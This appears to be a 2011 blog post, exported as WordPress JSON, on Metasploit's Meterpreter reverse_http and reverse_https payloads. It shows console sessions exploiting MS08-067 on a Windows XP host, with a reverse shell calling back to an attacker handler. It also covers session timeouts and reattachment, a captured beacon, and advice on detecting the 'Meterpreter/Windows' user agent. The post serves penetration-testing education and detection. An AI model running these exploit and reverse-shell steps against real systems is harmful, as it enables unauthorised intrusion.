{"id":155,"date":"2011-07-07T13:34:36","date_gmt":"2011-07-07T12:34:36","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=155"},"modified":"2011-07-07T13:39:33","modified_gmt":"2011-07-07T12:39:33","slug":"meterpreters-new","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2011\/07\/07\/meterpreters-new\/","title":{"rendered":"Meterpreter&#8217;s new reverse_http and reverse_https options"},"content":{"rendered":"<p>So we&#8217;ve all been unlucky enough to have a meterpreter session die on us, and then we&#8217;ve all been unlucky enough that we cannot re-exploit the box using the same vulnerability for some reason or another.<\/p>\n<p>No one I know in the White Hat scene likes to use any form of persistence with a payload; and you&#8217;d be nuts to use the bind_tcp option through fear of leaving it running. (I&#8217;ve heard horror stories of teams turning up to perform a test and finding <a href=\"http:\/\/netcat.sourceforge.net\/\" target=\"_blank\">netcat<\/a> listeners running on the targets from the previous years test!)<\/p>\n<p>On 29th June 2011 <a href=\"http:\/\/community.rapid7.com\/community\/metasploit\/blog\/2011\/06\/29\/meterpreter-httphttps-communication\" target=\"_blank\">HD Moore released a new set of payloads<\/a>, specifically the windows\/meterpreter\/reverse_http(s) payloads we&#8217;re interested in.<\/p>\n<p>The most interesting thing about these new payloads is that they are no longer tied into a single TCP session; thus, if you&#8217;re connection dies they victim will attempt to reconnect to the listener automatically! Sweet!<br \/>\n<i>This is probably even better news for those taking exams such as CHECK Team Leader and the like where wasting time re exploiting a box could be the difference between pass and fail.<\/i><\/p>\n<p>And that&#8217;s it really, just use it the same way you would with reverse_tcp.<br \/>\n<i>If you&#8217;re using exploit\/multi\/handler make sure to set the payload correctly to re-establish the session.?<\/i><\/p>\n<p>Going on from this it&#8217;s important to understand when the payload will terminate. We wouldn&#8217;t want it to keep connecting back to the attacker for ever. There are some advanced options that we need to be aware of for the reverse_http and reverse_https payloads.<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/><\/div><\/td><td><div class=\"bash codecolorer\">msf exploit<span class=\"br0\">&#40;<\/span>ms08_067_netapi<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> show advanced<br \/>\nPayload advanced options <span class=\"br0\">&#40;<\/span>windows<span class=\"sy0\">\/<\/span>meterpreter<span class=\"sy0\">\/<\/span>reverse_http<span class=\"br0\">&#41;<\/span>:<br \/>\n&nbsp; &nbsp;Name &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : SessionCommunicationTimeout<br \/>\n&nbsp; &nbsp;Current Setting: <span class=\"nu0\">300<\/span><br \/>\n&nbsp; &nbsp;Description &nbsp; &nbsp;: The number of seconds of no activity before this session should be killed<br \/>\n<br \/>\n&nbsp; &nbsp;Name &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : SessionExpirationTimeout<br \/>\n&nbsp; &nbsp;Current Setting: <span class=\"nu0\">604800<\/span><br \/>\n&nbsp; &nbsp;Description &nbsp; &nbsp;: The number of seconds before this session should be forcible shut down<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><b>SessionExpirationTimeout<\/b> simply tells the payload to terminate regardless of an open connection or not after this amount of time. <i>Default = 1 week<\/i><br \/>\n<b>SessionCommunicationTimeout<\/b> simply tells the payload to terminate itself after a period of not being able to connect back to the attacker. <i>Default = 5 minutes<\/i><\/p>\n<p>There is another option (<b>core_shutdown<\/b>) that tells the payload to terminate if the session is exited through the metasploit console.<\/p>\n<p>The major benefit of using the <b>reverse_http<\/b> and <b>reverse_https<\/b> payloads is that they follow the standard HTTP protocol and can traverse proxies.<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/><\/div><\/td><td><div class=\"bash codecolorer\">msf exploit<span class=\"br0\">&#40;<\/span>ms08_067_netapi<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> exploit<br \/>\n<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Started HTTP reverse handler on http:<span class=\"sy0\">\/\/<\/span>192.168.1.109:<span class=\"nu0\">80<\/span><span class=\"sy0\">\/<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Automatically detecting the target...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Fingerprint: Windows XP - Service Pack <span class=\"nu0\">0<\/span> <span class=\"sy0\">\/<\/span> <span class=\"nu0\">1<\/span> - lang:English<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Selected Target: Windows XP SP0<span class=\"sy0\">\/<\/span>SP1 Universal<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Attempting to trigger the vulnerability...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> 192.168.1.151:<span class=\"nu0\">1449<\/span> Request received <span class=\"kw1\">for<\/span> <span class=\"sy0\">\/<\/span>INITM...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> 192.168.1.151:<span class=\"nu0\">1449<\/span> Staging connection <span class=\"kw1\">for<\/span> target <span class=\"sy0\">\/<\/span>INITM received...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Patched transport at offset <span class=\"nu0\">486516<\/span>...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Patched URL at offset <span class=\"nu0\">486248<\/span>...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Patched Expiration Timeout at offset <span class=\"nu0\">641856<\/span>...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Patched Communication Timeout at offset <span class=\"nu0\">641860<\/span>...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Meterpreter session <span class=\"nu0\">3<\/span> opened <span class=\"br0\">&#40;<\/span>192.168.1.109:<span class=\"nu0\">80<\/span> -<span class=\"sy0\">&gt;<\/span> 192.168.1.151:<span class=\"nu0\">1449<\/span><span class=\"br0\">&#41;<\/span> at <span class=\"nu0\">2011<\/span>-07-07 <span class=\"nu0\">13<\/span>:03:<span class=\"nu0\">20<\/span> +0100<br \/>\n<br \/>\nmeterpreter <span class=\"sy0\">&gt;<\/span> <span class=\"kw3\">pwd<\/span><br \/>\nC:\\<br \/>\nmeterpreter <span class=\"sy0\">&gt;<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><b>SWEET!<\/b><\/p>\n<p>If you&#8217;re unfortunate to have msfconsole die your end simply start the multi\/exploit\/handler with the correct payload (http\/https)<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/><\/div><\/td><td><div class=\"bash codecolorer\">msf <span class=\"sy0\">&gt;<\/span> use exploit<span class=\"sy0\">\/<\/span>multi<span class=\"sy0\">\/<\/span>handler <br \/>\nmsf exploit<span class=\"br0\">&#40;<\/span>handler<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> <span class=\"kw1\">set<\/span> payload windows<span class=\"sy0\">\/<\/span>meterpreter<span class=\"sy0\">\/<\/span>reverse_http<br \/>\npayload =<span class=\"sy0\">&gt;<\/span> windows<span class=\"sy0\">\/<\/span>meterpreter<span class=\"sy0\">\/<\/span>reverse_http<br \/>\nmsf exploit<span class=\"br0\">&#40;<\/span>handler<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> <span class=\"kw1\">set<\/span> LHOST 192.168.1.109<br \/>\nLHOST =<span class=\"sy0\">&gt;<\/span> 192.168.1.109<br \/>\nmsf exploit<span class=\"br0\">&#40;<\/span>handler<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> <span class=\"kw1\">set<\/span> LPORT <span class=\"nu0\">80<\/span><br \/>\nLPORT =<span class=\"sy0\">&gt;<\/span> <span class=\"nu0\">80<\/span><br \/>\nmsf exploit<span class=\"br0\">&#40;<\/span>handler<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> exploit<br \/>\n<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Started HTTP reverse handler on http:<span class=\"sy0\">\/\/<\/span>192.168.1.109:<span class=\"nu0\">80<\/span><span class=\"sy0\">\/<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Starting the payload handler...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> 192.168.1.151:<span class=\"nu0\">1710<\/span> Request received <span class=\"kw1\">for<\/span> <span class=\"sy0\">\/<\/span>CONN_e7LiknUYlilI6RW8<span class=\"sy0\">\/<\/span>...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Incoming orphaned session CONN_e7LiknUYlilI6RW8, reattaching...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Meterpreter session <span class=\"nu0\">1<\/span> opened <span class=\"br0\">&#40;<\/span>192.168.1.109:<span class=\"nu0\">80<\/span> -<span class=\"sy0\">&gt;<\/span> 192.168.1.151:<span class=\"nu0\">1710<\/span><span class=\"br0\">&#41;<\/span> at <span class=\"nu0\">2011<\/span>-07-07 <span class=\"nu0\">13<\/span>:<span class=\"nu0\">11<\/span>:00 +0100<br \/>\n<br \/>\nmeterpreter <span class=\"sy0\">&gt;<\/span> <span class=\"kw3\">pwd<\/span><br \/>\nC:\\<br \/>\nmeterpreter <span class=\"sy0\">&gt;<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>The interesting thing to note here is that this type of attack is going to be relatively easy for sys admins to notice.<br \/>\nShown here is a sample of how the payload talks back to the attacker:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/><\/div><\/td><td><div class=\"bash codecolorer\">POST <span class=\"sy0\">\/<\/span>CONN_e7LiknUYlilI6RW8<span class=\"sy0\">\/<\/span> HTTP<span class=\"sy0\">\/<\/span><span class=\"nu0\">1.0<\/span><br \/>\nUser-Agent: Meterpreter<span class=\"sy0\">\/<\/span>Windows<br \/>\nHost: 192.168.1.109<br \/>\nContent-Length: <span class=\"nu0\">4<\/span><br \/>\nPragma: no-cache<br \/>\n<br \/>\nRECV<br \/>\n<br \/>\nHTTP<span class=\"sy0\">\/<\/span><span class=\"nu0\">1.1<\/span> <span class=\"nu0\">200<\/span> OK<br \/>\nContent-Type: application<span class=\"sy0\">\/<\/span>octet-stream<br \/>\nConnection: close<br \/>\nServer: Rex<br \/>\nContent-Length: <span class=\"nu0\">0<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Simply monitoring your site inbound\/outbound traffic for any user agent along the lines of <b>Meterpreter\/Windows<\/b> should throw up some serious concerns if it&#8217;s seen. Unfortunately this should also pretty easy for a blackhat attacker to modify:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/><\/div><\/td><td><div class=\"bash codecolorer\">root<span class=\"sy0\">@<\/span>bt:<span class=\"sy0\">\/<\/span>pentest<span class=\"sy0\">\/<\/span>exploits<span class=\"sy0\">\/<\/span>framework3<span class=\"co0\"># find . | xargs grep -i 'Meterpreter\\\/Windows' -s1 <\/span><br \/>\n.<span class=\"sy0\">\/<\/span>external<span class=\"sy0\">\/<\/span>source<span class=\"sy0\">\/<\/span>meterpreter<span class=\"sy0\">\/<\/span>source<span class=\"sy0\">\/<\/span>server<span class=\"sy0\">\/<\/span>server_setup.c- <span class=\"sy0\">\/\/<\/span> Allocate the top-level handle<br \/>\n.<span class=\"sy0\">\/<\/span>external<span class=\"sy0\">\/<\/span>source<span class=\"sy0\">\/<\/span>meterpreter<span class=\"sy0\">\/<\/span>source<span class=\"sy0\">\/<\/span>server<span class=\"sy0\">\/<\/span>server_setup.c: remote-<span class=\"sy0\">&gt;<\/span>hInternet = InternetOpen<span class=\"br0\">&#40;<\/span><span class=\"st0\">&quot;Meterpreter\/Windows&quot;<\/span>, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, <span class=\"nu0\">0<\/span><span class=\"br0\">&#41;<\/span>;<br \/>\n.<span class=\"sy0\">\/<\/span>external<span class=\"sy0\">\/<\/span>source<span class=\"sy0\">\/<\/span>meterpreter<span class=\"sy0\">\/<\/span>source<span class=\"sy0\">\/<\/span>server<span class=\"sy0\">\/<\/span>server_setup.c- <span class=\"kw1\">if<\/span> <span class=\"br0\">&#40;<\/span><span class=\"sy0\">!<\/span>remote-<span class=\"sy0\">&gt;<\/span>hInternet<span class=\"br0\">&#41;<\/span> <span class=\"br0\">&#123;<\/span><br \/>\n<span class=\"re5\">--<\/span><br \/>\nroot<span class=\"sy0\">@<\/span>bt:<span class=\"sy0\">\/<\/span>pentest<span class=\"sy0\">\/<\/span>exploits<span class=\"sy0\">\/<\/span>framework3<span class=\"co0\">#<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n","protected":false},"excerpt":{"rendered":"<p>So we&#8217;ve all been unlucky enough to have a meterpreter session die on us, and then we&#8217;ve all been unlucky enough that we cannot re-exploit the box using the same vulnerability for some reason or another. No one I know in the White Hat scene likes to use any form of persistence with a payload; [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[64],"tags":[74,75,456,47],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/155"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=155"}],"version-history":[{"count":12,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/155\/revisions"}],"predecessor-version":[{"id":166,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/155\/revisions\/166"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=155"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=155"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=155"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}